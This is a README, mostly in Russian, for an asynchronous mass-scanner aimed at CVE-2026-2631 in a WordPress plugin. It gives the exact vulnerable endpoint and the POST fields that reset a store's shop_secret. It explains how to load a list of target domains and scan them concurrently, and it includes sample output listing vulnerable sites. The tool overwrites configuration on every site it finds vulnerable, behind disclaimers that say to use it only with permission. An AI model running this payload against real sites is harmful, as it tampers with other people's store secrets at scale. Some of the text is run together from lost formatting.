
Асинхронный масс-чекер для авторизованного внутреннего тестирования подверженности CVE-2026-2631.
Приватный асинхронный масс-чекер для внутренней валидации WordPress
Этот инструмент выполняет деструктивную валидацию.
Он отправляет POST-запрос на целевой endpoint и может изменить
shop_secretна уязвимых целях.Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Этот проект — лёгкий асинхронный масс-чекер, созданный для приватной валидации подверженности CVE-2026-2631 на принадлежащих вам WordPress-целях и поддоменах.
Сканер предназначен для:
Этот репозиторий предназначен только для частного/внутреннего использования.
aiohttpvuln_results.txtrichСканер отправляет запрос на:
/wp-json/gsf/v1/update-options
Используется POST-запрос со следующими полями валидации:
action=resetStoreConfigrationsshop_secret=<кастомное или значение по умолчанию>Цель помечается как уязвимая, когда:
200, иСканер также применяет простой фильтр паттернов ошибок для снижения очевидных ложных срабатываний.
aiohttprich (опционально, для цветного вывода)Установка зависимостей:
pip install aiohttp rich
Подготовьте файл с целями, например list.txt:
example.com
sub.example.com
https://app.example.com
http://dev.example.com
Запустите сканер:
python main.py
Скрипт запросит:
YES)shop_secretЗначения по умолчанию:
list.txt2010 секунд #####################################################################
# CVE-2026-2631 Scanner - Async Mass Checker (Author AnggaTechI) #
# Only vulnerable targets will be shown and logged. #
# WARNING: This test CHANGES shop_secret on vulnerable #
# sites. Use only with permission. #
# https://github.com/AnggaTechI #
#####################################################################
⚠️ DESTRUCTIVE OPERATION WARNING
This script will change shop_secret on vulnerable sites.
Scanning 250 targets with 20 concurrent requests...
Only vulnerable sites will appear below.
https://target.tld -> Vuln Found
https://sub.target.tld -> Vuln Found
[Progress] 50/250 scanned...
[Progress] 100/250 scanned...
=== Scan Complete ===
Total targets : 250
Vulnerable found : 2
Errors (by type) :
- timeout: 4
- connection: 7
Положительные результаты сохраняются в:
vuln_results.txt
В файл результатов записываются только цели, идентифицированные как уязвимые.
Этот репозиторий поддерживается только для частных исследований и внутренних целей валидации.
Автор не несёт ответственности за неправомерное использование, несанкционированное сканирование, нарушение работы сервисов или изменения конфигурации, вызванные некорректной эксплуатацией этого инструмента.
Используйте ответственно. Используйте осторожно. Используйте только с разрешения.
AnggaTechI
Приватный инструментарий для безопасности во внутренних рабочих процессах.